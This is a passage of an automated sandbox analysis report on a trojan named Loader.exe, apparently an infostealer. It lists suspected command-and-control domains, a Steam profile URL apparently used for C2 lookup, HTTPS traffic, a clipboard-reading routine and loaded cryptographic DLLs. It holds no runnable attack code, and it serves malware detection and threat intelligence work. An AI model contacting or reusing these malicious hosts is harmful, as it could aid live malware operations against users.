    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/1w#U
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/api
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/api%U
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/api(
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs/v
    Source: Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://resinedyw.sbs:443/apii
    Source: Loader.exe, 00000003.00000002.2304373806.0000000000D07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: Loader.exe, 00000003.00000002.2304373806.0000000000D46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: Loader.exe, 00000003.00000002.2304373806.0000000000D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://widdensmoywi.sbs/api
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownHTTPS traffic detected: 104.21.8.37:443 -> 192.168.2.6:49710 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49761 version: TLS 1.2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00436F40
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00436F40
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001EE0200_2_001EE020
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001FA1A00_2_001FA1A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C62200_2_001C6220
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002023600_2_00202360
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001DA4960_2_001DA496
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D84960_2_001D8496
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C84A00_2_001C84A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0019C62E0_2_0019C62E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001DE6E00_2_001DE6E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002027700_2_00202770
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F08920_2_001F0892
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D48820_2_001D4882
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002048900_2_00204890
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F49900_2_001F4990
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001ECA950_2_001ECA95
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00204B300_2_00204B30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E0B000_2_001E0B00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C8B600_2_001C8B60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F4C000_2_001F4C00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00202C600_2_00202C60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CCC400_2_001CCC40
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C4DD00_2_001C4DD0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00204E000_2_00204E00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C2E500_2_001C2E50
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00196E6F0_2_00196E6F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D6F0F0_2_001D6F0F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BEF000_2_001BEF00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001EEFD90_2_001EEFD9
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CCFC00_2_001CCFC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D2FC00_2_001D2FC0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C8FF00_2_001C8FF0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001FEFE00_2_001FEFE0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CF0000_2_001CF000
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001A90740_2_001A9074
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002050F00_2_002050F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CF1A30_2_001CF1A3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F31D00_2_001F31D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BF1F30_2_001BF1F3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E31E20_2_001E31E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001EB2270_2_001EB227
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BF24E0_2_001BF24E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D33970_2_001D3397
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CB3D00_2_001CB3D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E14100_2_001E1410
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E94000_2_001E9400
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F34000_2_001F3400
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BF4370_2_001BF437
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BF4B10_2_001BF4B1
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E54B00_2_001E54B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001BF5020_2_001BF502
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001EF5CE0_2_001EF5CE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C16700_2_001C1670
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001AD7A50_2_001AD7A5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C57D00_2_001C57D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CB7C00_2_001CB7C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001ED8000_2_001ED800
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F98700_2_001F9870
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C78F60_2_001C78F6
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D99AE0_2_001D99AE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001DFA3E0_2_001DFA3E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001F9AD00_2_001F9AD0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0019FB000_2_0019FB00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C9B000_2_001C9B00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001E1B300_2_001E1B30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00203B770_2_00203B77
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001CFB6A0_2_001CFB6A
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001D9C730_2_001D9C73
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00191CD20_2_00191CD2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00201E210_2_00201E21
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001ABE210_2_001ABE21
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00191F1A0_2_00191F1A
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001A3F530_2_001A3F53
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001C7FE00_2_001C7FE0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001A90742_2_001A9074
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0019FB002_2_0019FB00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00191CD22_2_00191CD2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0019C62E2_2_0019C62E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001ABE212_2_001ABE21
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00196E6F2_2_00196E6F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00191F1A2_2_00191F1A
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001A3F532_2_001A3F53
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001AD7A52_2_001AD7A5
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004112A33_2_004112A3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00443D4F3_2_00443D4F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004010003_2_00401000
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041900F3_2_0041900F
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040F0C03_2_0040F0C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004150C03_2_004150C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A0E03_2_0040A0E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004410E03_2_004410E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040B0F03_2_0040B0F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004320A33_2_004320A3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004111003_2_00411100
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004301203_2_00430120
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004471F03_2_004471F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004202333_2_00420233
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004352D03_2_004352D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004252E23_2_004252E2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C2EE3_2_0042C2EE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004012F33_2_004012F3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043C2A03_2_0043C2A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004452A03_2_004452A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004122B03_2_004122B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040134E3_2_0040134E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004293703_2_00429370
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004083203_2_00408320
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3273_2_0042D327
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004453F03_2_004453F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004444603_2_00444460
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040D4D03_2_0040D4D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004154973_2_00415497
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B5003_2_0042B500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004295003_2_00429500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004355003_2_00435500
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004235103_2_00423510
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D5303_2_0042D530
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A5963_2_0041A596
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C5963_2_0041C596
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A5A03_2_0040A5A0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004275B03_2_004275B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004455B03_2_004455B0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004016023_2_00401602
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004316CE3_2_004316CE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004037703_2_00403770
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004287703_2_00428770
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004457003_2_00445700
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042E7C23_2_0042E7C2
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004207E03_2_004207E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004457F03_2_004457F0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004448703_2_00444870
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040F8193_2_0040F819
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040D8C03_2_0040D8C0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004078D03_2_004078D0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C8DA3_2_0042C8DA
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043B9703_2_0043B970
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042F9003_2_0042F900
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C9313_2_0042C931
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004169823_2_00416982
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004329923_2_00432992
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004469903_2_00446990
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00421A603_2_00421A60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041FAC93_2_0041FAC9
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042BAF13_2_0042BAF1
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436A903_2_00436A90
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041BAAE3_2_0041BAAE
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00445B203_2_00445B20
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043BBD03_2_0043BBD0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00411C5B3_2_00411C5B
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040AC603_2_0040AC60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427C6E3_2_00427C6E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040BC003_2_0040BC00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422C003_2_00422C00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043CC173_2_0043CC17
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423C303_2_00423C30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00446C303_2_00446C30
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040ED403_2_0040ED40
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00444D603_2_00444D60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00408D703_2_00408D70
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041BD733_2_0041BD73
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042AD003_2_0042AD00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436D003_2_00436D00
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404E603_2_00404E60
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041EE2E3_2_0041EE2E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00406ED03_2_00406ED0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00446F003_2_00446F00
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0019B301 appears 32 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 001A35FA appears 34 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 001CA620 appears 99 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0019D545 appears 42 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0040C720 appears 70 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 001CBE70 appears 198 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 0040DF70 appears 198 times
    Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00197760 appears 104 times
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284
    Source: Loader.exeStatic PE information: invalid certificate
    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Loader.exeStatic PE information: Section: .data ZLIB complexity 0.9913109893578643
    Source: classification engineClassification label: mal100.troj.evad.winEXE@8/13@11/9
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043C754 CoCreateInstance,CoCreateInstance,3_2_0043C754
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7096
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5200
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1d8f5f5e-7da6-4e0d-9db7-4cbc689c2b24Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeCommand line argument: MZx0_2_00192198
    Source: C:\Users\user\Desktop\Loader.exeCommand line argument: MZx0_2_00192198
    Source: C:\Users\user\Desktop\Loader.exeCommand line argument: MZx0_2_00192198
    Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Loader.exeReversingLabs: Detection: 42%
    Source: Loader.exeVirustotal: Detection: 41%
    Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
